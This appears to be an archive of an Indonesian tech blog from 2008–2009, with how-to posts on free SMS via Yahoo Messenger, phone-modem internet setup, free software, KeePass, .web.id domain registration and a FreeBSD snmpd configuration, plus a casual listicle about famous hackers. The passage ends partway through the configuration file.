GembelCorp

Yahoo Messenger adalah IM (Instant Messaging) andalan saya. Memang sih banyak sekali aplikasi IM di luar sana. Cuman ya saya pakai satu ini saja daripada di campur-campur tambah bingung. Meskipun sudah banyak bahasan tentang pengiriman SMS gratis dengan Yahoo Messenger, saya akan coba menuliskannya lagi sesuai pengalaman saya.

Ya, dengan Yahoo Messenger ini kita dapat mengirimkan SMS kepada teman-teman kita secara gratis! Tapi memang YM belum mendukung semua operator di Indonesia. Daftar operator yang telah di dukung YM dapat anda baca di sini. Sesuai dengan daftar nya sih baru:

Indonesia: Excelcom — 9246, Hutch3 — 92466, Indosat — 946, Telkomsel — 4246

Kali ini saya akan coba mengirimkan ke handphone saya sendiri yang ikut operator Telkomsel (kaga promosi lho ini…).

Buka Yahoo Messenger anda dan login.
Klik kanan kontak anda dan pilih menu Send SMS Message.
Jika di data kontak anda belum ada data no mobile nya maka anda akan di minta memasukkannya. Perhatikan karena kode internasional Indonesia adalah +62, maka anda harus awali no hp-nya dengan +62. Misal no hp teman anda adalah 081111111, maka anda harus menuliskannya +6281111111 lalu klik tombol OK.
Lalu tinggal tulis pesan anda di layar chat. Jumlah karakter yang bisa anda kirimkan adalah 149 karakter, berbeda dengan SMS melalui handphone biasa yang bisa 160 karakter. 11 karakter lainnya akan di pakai keterangan pengirimnya oleh YM.
Menurut percobaan saya, SMS langsung masuk hampir tanpa jeda.

Menurut saya lumayan lah, kalo ingin ngirit pulsa HP kita.

Koneksi Ke Internet via HP Nokia

2009-01-04T14:28:00.000+07:00

Tentu anda sudah membaca banyak artikel tentang menggunakan handphone Nokia CDMA anda sebagai sebuah modem. Artikel ini kemungkinan saya hanya mengulang saja diartikel ini, ya… itung-itung untuk memperkaya isi blog ini. Kali ini saya akan membahas cara untuk menggunakan HP Nokia 2115i, kabel CA-42 dan StarOne sebagai provider ke jaringan internetnya. Sebetulnya settings nya sangat sederhana, tapi tetap saja membuat saya kebingungan ketika pertama kali membuat perangkat ini sebagai modal untuk mengelola blog-blog saya.

Peralatan yang perlu anda persiapkan sebagai berikut:

Handphone Nokia CDMA (boleh memakai GSM, tetapi dalam artikel ini akan dibahas yang CDMA) yang ada modem-nya seperti yang saya pakai seri 2115. Kalau saya dengar 2116 juga bisa.
Kabel CA-42 atau kabel DKU-5. Saya memakai CA-42 karena waktu itu kebetulan sudah ada yang CA-42, ngga usah original. Harga bervariasi antara 25-65 ribu.
Driver kabel koneksi anda, biasanya disertakan waktu membeli kabel tersebut.
Driver modem Nokia. Saya sampai lupa dulu dapatnya dari mana (keliatannya sih di website mobile-8), tapi anda juga dapat mengunduhnya disini.

Setelah semua peralatan dan driver sudah siap, lakukan langkah-langkah sebagai berikut:

Install driver kabel koneksi anda. Caranya sangat mudah, masukkan saja CD bawaan kabel tersebut dan biasanya otomatis akan muncul layar untuk install driver. Kalau tidak ada autorun program, jelajahi isi CD driver tersebut dan klik ganda file setup.exe di root folder CD tersebut dan tinggal ikuti saja langkah-langkah yang ada (biasanya sih tinggal tekan Next terus)
Install driver modem Nokia yang telah anda download. File tersebut bernama nmpCDMA1xRTT.inf. Untuk menginstall driver tersebut:
- Klik Start - Control Panel menu.
- Klik ganda ikon Phone and Modem Options.
- Klik tab Modem lalu klik tombol Add…
- Dilayar wizard pertama, silang opsi Don’t detect my modem; I will select it from a list, lalu tekan tombol Next.
- Dilayar Install New Modem, klik tombol Have Disk, lalu arahkan ke-file nmpCDMA1xRTT.inf (hasil download)
- Setelah driver tersebut terinstall dengan baik, maka anda dapat melihatnya didaftar dan pastikan anda memilih di Manufacture: Nokia Mobile Phones CDMA2000 1X Data/Fax dan di-daftar model pilih Nokia CDMA2000 1X 3G Packet Data Modem (anda juga bisa memlih Nokia CDMA2000 1X 2G Packet Data Modem, dan saya tidak melihat perbedaan diantara model yang 3G dan 2G). Jika anda di-konfirm masalah signature driver, klik Continue Anyway saja.
- Jika driver modem sudah terinstall, anda akan melihatnya di-daftar modem.
- Untuk menguji apakah modem dan drivernya sudah bekerja dengan baik, klik Modem Nokia CDMA2000 1X 3G Packet Data Modem dan tekan tombol Properties yang terletak agak bawah. Dilayar Modem Properties, klik tab Diagnostics dan tekan tombol Query Modem. Jika anda mendapat pesan semacam dibawah ini, berarti installasi driver dan modem anda sudah bekerja dengan baik dan siap untuk digunakan.
Setelah driver kabel dan modem sudah terinstal dengan baik, sekarang tinggal membuat koneksi baru. Sebetulnya langkah yang diambil persis ketika anda membuat koneksi baru untuk TelkomNet Instan dan sebangsanya:
- Klik Start - Control Panel, klik ganda ikon Network Connections.
- Di Network Connections, klik menu File -> New Connection.
- Di layar wizard, klik Next, pilih opsi Connect to the Internet lalu klik Next.
- Di layar selanjutnya, pilih Set up my connection manually, lalu klik tombol Next.
- Di layar selanjutnya, pilih Connect using a dial up modem, lalu klik tombol Next.
- Di layar selanjutnya, isi nama provider anda, dalam kasus saya ini saya ketikkan StarOne dan lalu klik tombol Next.
- Di layar selanjutnya, isikan nomor dialnya, biasanya nomor dial yang digunakan adalah #777 termasuk yang dipakai oleh StarOne.
- Di layar selanjutnya, isi User name dan Password-nya. Untuk StarOne, User name adalah starone dan passwordnya adalah indosat dan jangan lupa ketikkan password yang sama dikotak isian Confirm password. Lalu klik tombol Next.
- Akhirnya selesai juga, klik tombol Finish.
Sekarang tinggal mendial hasil kerja anda. Klik menu Start - Connect To dan pilih provider anda, kalau di kasus saya, saya pilih StarOne dan klik tombol Dial.

Jika anda sudah terkoneksi dan modem anda terdeteksi terlalu lambat, coba disconnect dulu dan klik kembali StarOne. Klik tombol Properties, klik tombol Configure dibawah nama modem yang anda gunakan, di Modem Configuration,

atur maximum speed ke 115200 atau coba ke speed tertinggi yang ada di dalam pilihan. Dan coba koneksikan kembali.

Menurut pengalaman saya, jika anda memakai StarOne, maka anda harus daftar ke layanan support mereka dulu melalui telepon. Anda bisa memilih Volume base or Time based. Kalau saya memilih Time based dengan rate Rp.75/menit atau Rp.4.500/jam.
Semoga informasi ini sedikit bisa membantu anda.

Tools Komputer Serba Gratis

2009-01-04T14:23:00.000+07:00

Dengan maraknya razia software diberbagai tempat, terutama di kota-kota besar seperti Jakarta, Bandung, Semarang, Jogja dan Surabaya, kita dipaksa berpikir cerdik untuk mengakali hal itu. Bukan mengakali dengan kucing-kucingan, bukan itu maksud saya. Tetapi dengan mulai melihat maksud dari razia tersebut. Coba kita untuk berpikir positif sejenak, pada intinya kan razia itu hanya berusaha untuk melindungi hak-hak intelektual orang lain. Kita harus menghargai hal itu. Jalan keluar yang paling enak adalah membeli software tersebut. Menurut survey sebagian besar orang memakai Windows XP atau Vista, maka belilah software tersebut karena hal itu bisa membuat kita tenang dan belajar untuk menghargai karya orang lain. Lalu bagaimana jika kita tidak punya uang (termasuk saya hehehe)?

Cobalah melirik ke aplikasi-aplikasi yang bersifat open source, freeware atau gratis. Sekarang ini banyak sekali freeware yang ngga kalah dengan software berbayar. Coba saja lirik ke Ubuntu, OpenOffice, MySQL, GIMP dan masih banyak lagi.

Saya mencoba mendaftar aplikasi-aplikasi gratis yang ‘layak’ untuk kita pakai atau paling tidak di coba untuk merasakan kehebatannya.

Sistem Operasi
Ubuntu, hari ini Ubuntu adalah salah satu operating system open source terbaik yang tidak boleh diremehkan. Tampilannya sudah memukai, instalasi aplikasi tambahan sudah sangat gampang dan driver hardware sudah semakin lengkap saja. Kemarin saya download Ubuntu 8.04 yang sekarang semakin mudah saja mendampingkannya dengan Windows XP maupun Vista, tinggal klik tombol Install Ubuntu on Windows… selesai sudah tinggal ngikutin langkah-langkah yang diberikan. Ada bisa juga me-request CD gratis pada mereka, cuman sampai ketangan anda, anda harus extra sabar karena akan memakan waktu yang cukup lama. Jika anda punya sambungan internet unlimited, ngga ada salahnya ada coba download saja daripada me-request CD gratis. Kalau saya, cukup pakai hotspot di Galeria Mal, dalam waktu 6 jam selesai… gratis lagi.

Aplikasi Kantor
OpenOffice, aplikasi kantor yang satu ini semakin gampang saja untuk digunakan. Anda bisa menggunakannya tanpa dipungut biaya seperserpun, cukup download di site mereka, install lalu anda sudah dapat bekerja. Dipaket instalasinya, anda akan mendapat OpenOffice Write (pengganti Word), OpenOffice Calc (pengganti Excel), OpenOffice Base (pengganti Access) dan OpenOffice (pengganti PowerPoint). Memang menurut percobaan saya, aplikasi ini sedikit lambat jika dibanding Microsoft Office, tapi tidak sampai taraf mengganggu, jika komputer anda sudah cukup cepat maka tidak ada lagi alasan untuk tidak memakainya. Dan juga kompatibilitasnya terhadap format file Microsoft Office yang sudah tidak perlu diragukan lagi.

Design Graphics
GIMP, aplikasi ini memang beda dengan Photoshop untuk tampilannya, tapi jika anda ingin tampilan GIMP yang persis Photoshop, pengembangnya pun menyediakan tetapi anda harus beli meskipun tidak semahal Adobe Photoshop. Bagaimana kalau yang versi gratis? Jangan kuatir, GIMP ini cukup powerful untuk mengedit file-file foto anda. Dari Curve, Level, Saturation, Layer system sudah disediakan oleh GIMP. Dan hal itu cukup menakjubkan ketika anda dapat mendapatkannya dengan gratis.

Download Manager
Free Download Manager, meskipun Firefox di versi yang 3 ini anda dapat mengunduh file dengan tenang karena fungsi resume-nya dijanjikan sudah lebih baik dari versi yang sebelumnya, tetap saja dengan alasan tertentu anda masih membutuhkan tambahan aplikasi untuk mengunduh file-file yang bertebaran di internet. Banyak sekali aplikasi download manager gratis disana, cukup ketik “free download manager” di box google anda akan disuguhkan link-link kewebsite yang menyediakan aplikasi tersebut. Tetapi setelah beberapa kali mencoba, aplikasi Free Download Manager cukup menjanjikan untuk anda jadikan penolong ketika internet anda seperti kondisi listrik sekarang ini, yaitu byar pet… alias sering hidup tapi sering juga mati… hehehe.

FTP Manager
FileZilla, jika anda sering transfer file-file ke website anda atau mengunduhnya tentu anda membutuhkan aplikasi yang satu ini. Memang sih, aplikasi bawaan Windows XP sudah cukup memadai, tapi belum cukup kuat jika anda sering menggunakan layanan FTP. Dan yang paling menakjubkan dari FileZilla ini selain multi bahasa, FileZilla juga bisa me-resume download atau upload anda yang terputus.

Anti Virus
avast!, memang paling bagus jika anda membeli versi berbayarnya, tapi versi gratisnya juga tidak kalah menakjubkan, anda juga disediakan update database virusnya secara gratis juga dan bersifat Auto Update, jadi begitu anda terkoneksi dengan internet maka database anda akan di update secara otomatis.

Gantungan Kunci Buat Password Anda

2009-01-04T14:22:00.000+07:00

Sekarang ini, dimana layanan internet berkembang dengan luar biasa tidak terasa bertambah juga poin-poin penting yang juga harus di ingat. Layanan tersebut adalah dari situs pertemanan sampai ke layanan email. Poin yang paling nyata yang harus di ingat adalah user name dan password kita untuk setiap layanan. Biasanya untuk alasan keamanan kita di minta untuk membuat setiap akun kita berbeda untuk setiap layanan, terutama password-nya. Repotnya lagi, tidak cuman harus membedakan password antar layanan tapi juga password nya juga harus password yang tidak mudah di tebak.

Sayangnya, jika kita harus mengingat user name dan password itu satu-persatu akan menyulitkan kita sendiri. Untuk itu kita butuh sebuah ‘gantungan kunci’ untuk menyimpan password-password itu. Nah, kemarin itu saya mencari-cari aplikasi password manager untuk membantuk saya mengingat dan mengatur semua akun saya, dari akun Wordpress sampai ke Google Adsense saya. Memang sih bisa saja kita mengetiknya begitu saja dengan Notepad, cuman kalau file tersebut terambil oleh orang yang tidak bertanggung jawab, maka semua akun anda akan dalam bahaya besar.

Saya mencari aplikasi password manager yang bagus, aman, portable dan gratis (seperti biasa…). Bagus dalam artian dari segi interface harus mudah di gunakan, aman berarti file database aplikasi tersebut harus dalam keadaan terenkripsi jadi kalau tercuri tidak bisa di buka, portable berarti aplikasi ini harus bisa di bawa di USB drive agar ketika kita di komputer orang lain kita masih bisa membuka aplikasi tersebut dan terakhir gratis dalam artian tidak membayar hehehehe…

Akhirnya setelah cari-cari dan membanding beberapa aplikasi dengan syarat seperti di atas, akhirnya saya menemukannya. Nama aplikasi tersebut adalah Keepass Password Safe. Keepass tersedia secara gratis dengan dua versi yaitu Installer dan ZIP Package. Versi installer harus anda install dulu dan kebalikannya untuk ZIP Package, versi ini bisa anda ekstrak dan di bawa kemana aja di dalam USB Drive anda.

Saya memilih yang versi ZIP Package. Cara menggunakannya sangat mudah:

Tinggal ekstrak file .zip nya ke folder di USB drive.
Eksekusi file Keepass.exe. Jika anda baru pertama kali ini menggunakan Keepass anda harus membuat database baru dulu melalui menu File -> New.
Masukkan password master anda, nantinya password ini satu-satunya password yang perlu anda ingat. Keepass juga memungkinkan kita mengkombinasikannya dengan key file, cuma saya tidak memakainya karena takut key file nya hilang. Lalu anda akan di minta mengulangi memasukan password anda untuk konfirmasi.
Saran saya, simpan dulu database baru anda melalui menu File -> Save.
Nah, anda tinggal memasukkan password-password anda. Secara default, Keepas memberikan anda beberapa Group seperti gambar di bawah ini. Tapi jika anda merasa kurang atau kurang pas, tinggal menambahnya melalui menu Edit -> Add Password Group.
Untuk memulai memasukkan password anda, klik menu Edit -> Add Entry.
Jangan lupa simpan database anda setiap ada perubahan, entah ada entri baru atau edit entri.

Yang membuat program ini semakin menjadi kesukaan saya adalah adanya fasilitas Password Generator, dengan Password Generator kita bisa di sarankan membuat sebuah password yang baik. Selain itu Keepass memungkinkan kita untuk memasukkan user dan password ke login form di situs layanan secara otomatis. Coba saja ketika anda membuat entri baru, klik tombol Tools yang terletak di bawah dan anda akan semakin terpana…

Five Most TOP Hacker In the World !!!

2009-01-02T18:52:00.003+07:00

5 orang dibawah ini merupakan top 5 black hat hacker ato lebih dikenal dengan hacker yang bandel, jail, dan nakal!! tapi jangan diraguin lagi kemampuan mereka!!

1.JONATHAN JAMES
sapa siy niy ni orang...?okay, James adalah orang amerika, saat baru umur 16 taun dia dikirm ke penjara karena kelakuannya didunia maya cuy..situs departemen pertahanan Amerika dibobol ama si James dan dia cuma bilang itu tantangan bagi dia n merupakan datu kesenangan tersendiri..wah gila juga ni orang;;NASA juga kena keisengan dia, James nyuri software NASA ang diperkirakan seharga $1.7 juta dollar AS. sampe2 NASA dipaksa untuk mematikan server dan sistemnya!!!karena kelakuannya juga doi gak boleh megang komputer selama 10 tahun..kasian nih orang..haha tapi sekarang doi udah dijalan yang bener dan bikin sebuah perusahaan keamanan dibidang komputer..mantab!!

2. ADRIAN LAMO
ni orang juga sarap.doi ngebobol New York Times buat nedapetin info personal dan beberapa security number n ngebobol Microsoft (busyet gak tanggung2 dah). doi akhirnya didenda $65.000 dollar US,
saat ini doi jadi pembicara dibeberapa acara seminar!! bravo dach!!

3. KEVIN MITNICK
kalo menurut gw inilah legenda hidup yang saat ini bener2 mantap dalam dunia hack.!!
ni kelakuan doi:
* menggunakan Los Angeles bus transfer system buat ngedapetin tumpangan gatis
* Mengelabui FBI
* Hacking kedalam DEC system(Digital Equipment Corporation)
* ngedapetin administrator positon dalam satu komputer IBM biar menang judi, karena adminnya yang punya laptop IBM tersebut..haha
* Hacking Motorola, NEC, Nokia, Sun Microsystems dan Fujitsu Siemens systems
dan masih banyak lagi kelakuan doi yang luar binasa seorang white hat hacker pun yang bernama Tsutomu Shimomura pun (ahli juga doi dan merupakan top 5 white hat hacker), di hack komputer systemnya, dan terjadilah perang luar biasa..doi ketangkep dan kelacak oleh FBI dengan bantuan Tsutomu Shimomura yang ngelacak (tracking) lewat jaringan HP' yang dibawa ama Mitnick saat itu..tapi sekarang doi dah tobat n jadi seorang penulis buku, konsultan security, dan pembicara.

4. KEVIN POULSEN
juga dikenal dengan Dark Dante, doi ngehack database FBI (galak niy orang)
selain itu doi juga ngehack seluruh lines phone station. karena emang kemahiran dia ngehack lewat phone lines.saat ini, dia jadi senior editor di Wired News, dan berhasil mengengkap 744 penawaran sex melalui profiles Myspace..!!
sukses dach gan!!

5. ROBERT TAPPAN MORIS
niy orang adalah orang yang pertama kali bikin Worm, yang dinamain Morris Worm (narsis niy orang) melalui internet doi nyebari wormnya yang mengakibatkan sekitar 6000 komputer jadi down..!!!dia akhirnya dipenjarakan rumah selama 3 tahun dan didenda sebesar $10.500 dollars
sekarang doi kerja sebagai professor di sebuah MIT Computer Science and Artificial Intelligence Laboratory!!

HACKER LEGENDARIS

bernama KARL KOCH berasal dari hannover Jerman ang ngenamain komputernya FUCKUP
dia berhasil membobol beberapa sistem militer AS dan ngehacked sebuah pusat tenaga nuklir AS pada jaman perang dingin dan hasil hack'annya dijual ke KGB (Agen Rahasia Uni Soviet)
dia ditemukan tewas pada tahun 1988, menurut info dia membakar tubuhnya sendiri, namun siapa tau, ini konspirasi tingkat tinggi antara US dan Soviet pada perang dingin!
(First Universal Cybernetic-Kinetic Ultra-Micro Programmer), doi melakukan beberapa keberhasilan dalam ngehack pada kurun waktu 1985-1988. doi juga seorang cocaine addict!!

KasKuser

Akses Internet menggunakan Modem Ponsel

2008-12-22T14:03:00.000+07:00

Internet dengan modem ponsel? Keraguan tersebut seringkali muncul dalam benak para pengguna aktif internet. Salah satu sebabnya adalah perhitungan tarif yang berbeda dengan koneksi internet biasa. Pada umumnya biaya yang harus dibayar dihitung berdasarkan lamanya penggunaan internet. Namun jika Anda memanfaatkan jalur GPRS maka biaya dihitung berdasarkan ukuran data yang dikirim maupun diterima. Apakah hal ini akan menguntungkan untuk pengguna? Apa kelebihan yang diperoleh dari akses internet dengan modem ponsel?

Pemanfaatan ponsel sebagai modem untuk akses internet hanya merupakan salah satu alternatif koneksi internet. Caranya adalah dengan menghubungkan ponsel ke komputer/laptop melalui kabel data, infrared, ataupun bluetooth. Selanjutnya ponsel yang terhubung ke komputer akan digunakan sebagai modem untuk berbagai aktivitas di internet. Namun bagi sebagian orang, pemanfaatan ponsel sebagai modem sering dianggap sebagai tindakan buang-buang uang semata. Biaya yang dikeluarkan masih lebih besar dibandingkan dengan koneksi internet biasa. Setiap kilobyte data yang dikirim dan diterima dari jalur GPRS melalui ponsel dikenai biaya yang bervariasi, berkisar Rp. 5 sampai dengan Rp. 30 per kilobyte, tergantung dari pilihan operator.
Tarif rata-rata yang ditetapkan oleh Indosat Seluler untuk akses internet melalui IM3 dan Matrix adalah sebesar Rp. 11 per kilobyte. Sedangkan Mentari tidak menyediakan akses internet melalui GPRS. Hal ini dikarenakan layanan GPRS yang ada pada Mentari sampai saat ini hanya digunakan untuk mendukung pengiriman MMS. Sedangkan Telkomsel memasang tarif akses internet melalui simPATI sebesar Rp. 30 per kilobyte dan KartuHALO sebesar Rp. 25 per kilobyte. Bagi pengguna XL, setiap data yang diakses melalui jalur GPRS dikenai tarif sebesar Rp. 25 per kilobyte. Untuk operator CDMA seperti Mobile-8 (Fren), StarOne (Indosat), dan Telkom Flexi menghargai layanannya sebesar Rp. 5 per kilobyte.
Apabila Anda memanfaatkan Fren, StarOne, atau TelkomFlexi (Rp. 5/kilobyte) untuk mengakses halaman depan situs detik.com yang berukuran 386 Kilobyte, maka pulsa yang akan dipotong berkisar 1930 rupiah. Sedangkan jika menggunakan modem biasa untuk membaca situs yang sama, dibutuhkan waktu rata-rata sekitar 3,5 menit. Dengan lama waktu tersebut, Anda akan terkena biaya berkisar 580 rupiah apabila dihitung dengan perhitungan biaya Telkomnet Instan (Rp. 9.900 / jam). Namun biaya Rp. 580 tersebut tentunya masih harus ditambah dengan lamanya waktu koneksi selama Anda online pada saat membaca halaman tersebut. Namun meskipun telah ditambah dengan waktu baca sekalipun, penggunaan internet dengan modem biasa secara keseluruhan dapat dikatakan lebih murah.
Dengan perhitungan tarif per kilobyte seperti di atas, biaya pemanfaatan internet dengan modem biasa nyaris tak tergantikan oleh akses internet dengan modem ponsel, kecuali jika Anda memilih paket unlimited seperti yang ditawarkan oleh Indosat Seluler. Anda hanya mengeluarkan Rp. 200.000 untuk pemakaian paket unlimited tersebut dalam setiap bulannya, alias senilai Rp. 278 per jam. Namun harga ini hanya dirasakan ringan untuk pengguna internet yang kebutuhan internetnya cukup tinggi dalam setiap bulannya. Seseorang yang mempunyai aktivitas internet cukup tinggi, tentunya tidak akan rugi jika melihat perhitungan harga tersebut. Asalkan kecepatan yang diperoleh tidak mengecewakan, biaya tersebut dapat dikatakan cukup murah. Namun yang perlu diperhatikan, kecepatan akses setiap lokasi seringkali tidak sama. Tergantung dari daya pancar sinyal GPRS ke ponsel pelanggan dan waktu sibuk jalur komunikasi yang dipakai.
Jika Anda bukanlah pengguna internet aktif, apa keuntungan komparatif dari pemanfaatan ponsel sebagai modem?
Keunggulan yang nyata terletak pada kemudahan pemakaian internet di daerah yang tidak terjangkau oleh kabel telepon, jaringan komputer, atau bahkan oleh jangkauan hotspot internet sekalipun. Jika pada suatu daerah terpencil seseorang dapat memperoleh sinyal GPRS, maka ia dapat mengakses internet melalui komputer/laptopnya dengan memanfaatkan ponsel. Selain itu, Anda juga dapat memanfaatkan internet sekalipun masih berada dalam perjalanan, tanpa harus dipusingkan adanya kabel telepon maupun lokasi penyedia jasa layanan internet (ISP). Bagi Anda yang memiliki mobilitas tinggi, cara mengakses internet seperti ini jelas akan mempermudah pekerjaan. Selain itu, apabila dibandingkan dengan layanan dial-up, koneksi internet melalui modem ponsel jauh lebih cepat. Karena kecepatan akses melalui jalur GPRS dapat mencapai 115 KBps, sedangkan pada pada dial-up maksimal hanya 56 KBps.

Instalasi
Sebelum memulai proses instalasi ponsel ke komputer, Anda harus memastikan layanan GPRS telah aktif terlebih dahulu. Khusus untuk IM3, layanan GPRS sudah langsung dapat digunakan ketika Anda membeli kartu perdana. Aktivasi GPRS yang paling mudah adalah dengan mengirimkan SMS dengan keyword tertentu ke salah satu nomor yang telah disediakan oleh operator ponsel. Beberapa operator yang menyediakan layanan SMS untuk aktivasi GPRS dapat Anda lihat pada tabel di bawah ini. Selain itu, Anda dapat menghubungi Customer Service masing-masing operator untuk aktivasi.

Tabel 1. Aktivasi GPRS

Operator	Ketik	Kirim Ke
Telkomsel	GPRS	6616
Indosat (Matrix)	PANGPRS	888
XL	GPRS	9667

Jika GPRS sudah aktif, carilah konektor yang sesuai dengan ponsel dan komputer/laptop Anda. Asalkan kedua ponsel memilikinya, Anda dapat menggunakan kabel data, infrared dan bluetooth sebagai penghubung antara ponsel dan komputer/laptop. Harga kabel data untuk setiap ponsel bervariasi, umumnya berkisar 250 ribu sampai dengan 500 ribu rupiah.
Jika pada layar komputer muncul pesan adanya modem yang terdeteksi ketika ponsel dihubungkan, maka siapkan driver modem yang disertakan dalam box ponsel. Pada beberapa versi Windows, seringkali dibutuhkan driver untuk melengkapi instalasi. Jika driver tidak ditemukan, Anda disarankan untuk men-download melalui situs vendor (perusahaan pembuat) yang bersangkutan di internet. Modem yang telah terinstalasi dapat dilihat melalui Start> Control Panel> Phone/Modem Options. Selanjutnya pilih modem yang telah dikenali dan tekan tombol Properties. Klik tab Properties > Advance. Pada kotak teks Extra Setting masukkan isian sebagai berikut: AT+CGDCONT=1, "IP", "APN". APN atau Access Point Name diisi dengan APN masing-masing operator misalkan internet (Telkomsel), satelindogprs.com (Matrix), www.indosat-m3.net (IM3), atau www.xlgrps.net (XL). Sebagai contoh jika Anda menggunakan Telkomsel: AT+CGDCONT=1, "IP", "internet". Sedangkan jika Anda menggunakan Matrix: AT+CGDCONT=1, "IP", "satelindogprs.com". Tekan tombol OK untuk menyimpan pengaturan tersebut.

Selanjutnya buatlah konfigurasi dial-up melalui Dial-Up Networking atau Network Connections. Masukkan nomor akses, user, dan password sesuai dengan operator ponsel yang digunakan. Anda dapat melihatnya pada tabel 2 di bawah ini.

Tabel 2. Konfigurasi Dial-Up Networking

Kartu	Nomor Akses	User	Password
Simpati	99**1#	wap	wap123
Halo	99**1#	wap	wap123
Matrix	99**1#	[dikosongkan]	[dikosongkan]
IM3	99**1#	gprs	im3
Fren	#777	m8	m8
TelkomFlexi	#777	telkomnet@flexi	telkom
Star One	#777	starone	indosat

Selanjutnya Anda dapat mulai mencoba melakukan koneksi dengan konfigurasi dial yang telah Anda atur. Selamat mencoba!

Mendaftar Domain .web.id (Gratis)

2008-12-22T13:24:00.001+07:00

Dari beberapa permintaan mengenai panduan gimana mendapatkan domain web.id, saya tulis beberapa langkah praktis untuk mendaftar.

Daftar User di register.web.id

Buka halaman http://register.web.id. Jika anda belum memiliki account di register.web.id, lakukan pendafataran terlebih dahulu dengan klik [Register]. Isi formulir dengan benar. Username boleh tidak sama dengan domain yang akan kita daftarkan.

Mendaftarkan Domain Baru

Setelah proses registrasi selesai, login dengan user anda. Dan kerjakan langkah-langkah berikut.

Periksa domain yang akan didaftarkan apakah masih tersedia atau tidak. Masuk ke halaman pemeriksaan domain.
Masukkan domain yang akan diperiksa dan pilih induk domain yang diinginkan (dalam hal ini kita ingin mendaftar domain .web.id)
Jika domain terlah digunakan oleh orang lain, ganti nama domain yang lain. Jika domain masih tersedia, klik tombol [Register] di bawah.
Isi formulir pendaftaran domain dengan lengkap dan benar.
Name diisi dengan nama anda
Registrant type: Personal
Primary server diisi dengan nameserver anda (contoh: ns1.myhosting.com). Jika belum memiliki nameserver bisa diisi sembarang dulu, bisa diubah di kemudian hari.
Net Address diisi dengan IP address nameserver anda.
Setelah semua formulir diisi dengan benar, klik tombol [Register]

Langkah selanjutnya adalah upload dokumen

Upload Dokumen

Untuk melakukan upload dokument, klik menu [Document Management], dan klik tombol [Create] untuk upload dokumen baru.

Pada halaman Document Submission:

Pilih domain yang telah didaftarkan (belum disetujui)
Pilih dokument type dengan KTP atau SIM (sesuai dengan dokument yang akan diupload)
Document number diisi dengan nomor KTP atau SIM (contoh: KTP#11.1234.010171.0064)
Browse file hasil pindaian (scan) KTP atau SIM
Klik [Submit] untuk mengirim dokumen

Selesai

Pendaftaran domain web.id selesai. Silakan tunggu beberapa waktu untuk mendapatkan persetujuan dari DepKomInfo. Domain saya dalam waktu kurang dari 24 jam disetujui. Namun teman saya yang butuh waktu satu minggu baru disetujui, tergantung dari kesibukan petugas DepKomInfo.

Setelah domain disetujui, maksimal butuh waktu 1x24jam untuk bisa mengakses domain baru kita. Lamanya waktu tergantung waktu sinkronisasi domain baru dengan pengelola domain internasional.

Setelah domain baru selesai dibuat, tinggal setting nameserver di komputer server / shared hosting. Setting di komputer server bisa lihat dokumentasi dari masing-masing OS. Sedangkan untuk shared hosting, bisa lihat manualnya di masing-masing hosting provider.

Selamat melakukan registrasi di domain web.id

ATAU

Saat ini kepengurusan domain tingkat negara id (indonesia) dipegang oleh pemerintah pada Departemen Kominfo. Depkominfo belum memutuskan harga untuk semua domainnya dan saat ini tidak mengenakan biaya untuk pendaftara domain baru. Domain berakhiran .id gratis yang paling mudah didapatkan oleh perseorangan adalah domain .web.id. Cara cukup mudah dan tidak memerlukan biaya.

Untuk mendapatkan domain gratis tersebut anda diwajibkan membuat account baru pada situs registrasi cctld-id. Setelah anda membuat account anda dapat meregister domain .web.id yang anda inginkan. Kemudian siapkan dokumen pendukung seperti file image scan KTP/SIM/Paspor anda yang masih berlaku dan menguploadnya ke situs pengelola cctld-id. Setelah itu anda tinggal menunggu domain anda diaktifkan oleh pengelola.

Yang perlu diperhatikan adalah anda tidak boleh meregister domain yang mengandung unsur pornografi, kejahatan, nama kota, nama daerah, dll. Domain yang anda daftarkan tidak mengikutsertakan hosting, di mana anda harus mencari tempat menaruh file html anda yang dapat diakses orang lain sendiri. Anda bisa mendapatkan web hosting gratis yang dapat menerima domain .web.id anda di www.dd.am, www.ahbhost.com, www.arroways.com, dan masih banyak lagi lainnya.

Anda tidak hanya dapat meregister .web.id karena anda juga bisa mendaftar domain lain seperti .or.id .co.id .net.id dan lain-lain jika anda dapat memenuhi persyaratannya. Untuk mengisi Domain Name server saat pendaftaran anda dapat mananyakannya ke tempat webhosting anda. Biasanya DNS terdiri dari 2 address. Setiap web hosting memiliki DNS masing-masing yang berbeda. Untuk Name server address (NS address) anda dapat menanyakan juga di tempat hosting anda atau mengeceknya di www.dnsstuff.com secara gratis. Selamat mencoba.

Kunjungi situsnya : https://register.net.id

Tutorial Konfigurasi SNMPD di FreeBSD

2008-12-22T13:16:00.000+07:00

Dibawah ini contoh file configurasi yg jalan untuk snmpd di FreeBSD.
Pada configurasi dibawah ini saya memantau penggunaan space dari HD server proxy di kantor beserta report resources dan penggunaan bandwidth oleh ethernetnya.

###########################################################################
#
# snmpd.conf
#
# - created by the snmpconf configuration program
#
###########################################################################
# SECTION: System Information Setup
#
# This section defines some of the information reported in
# the "system" mib group in the mibII tree.

# syslocation: The [typically physical] location of the system.
# Note that setting this value here means that when trying to
# perform an snmp SET operation to the sysLocation.0 variable will make
# the agent return the "notWritable" error code. IE, including
# this token in the snmpd.conf file will disable write access to
# the variable.
# arguments: location_string

syslocation "Labkom Center"

# syscontact: The contact information for the administrator
# Note that setting this value here means that when trying to
# perform an snmp SET operation to the sysContact.0 variable will make
# the agent return the "notWritable" error code. IE, including
# this token in the snmpd.conf file will disable write access to
# the variable.
# arguments: contact_string

syscontact berny@labkom.unikom.ac.id

# sysservices: The proper value for the sysServices object.
# arguments: sysservices_number

sysservices 12

###########################################################################
# SECTION: Access Control Setup
#
# This section defines who is allowed to talk to your running
# snmp agent.

# rwuser: a SNMPv3 read-write user
# arguments: user [noauth|auth|priv] [restriction_oid]

#rwuser secret

# rouser: a SNMPv3 read-only user
# arguments: user [noauth|auth|priv] [restriction_oid]

#rouser secret

# rocommunity: a SNMPv1/SNMPv2c read-only access community name
# arguments: community [default|hostname|network/bits] [oid]

rocommunity private 100.10.3.100

# rwcommunity: a SNMPv1/SNMPv2c read-write access community name
# arguments: community [default|hostname|network/bits] [oid]

rwcommunity berny 100.10.3.100

###########################################################################
# SECTION: Trap Destinations
#
# Here we define who the agent will send traps to.

# trapsink: A SNMPv1 trap receiver
# arguments: host [community] [portnum]

trapsink 100.10.3.100

# trap2sink: A SNMPv2c trap receiver
# arguments: host [community] [portnum]

trap2sink 100.10.3.100

# informsink: A SNMPv2c inform (acknowledged trap) receiver
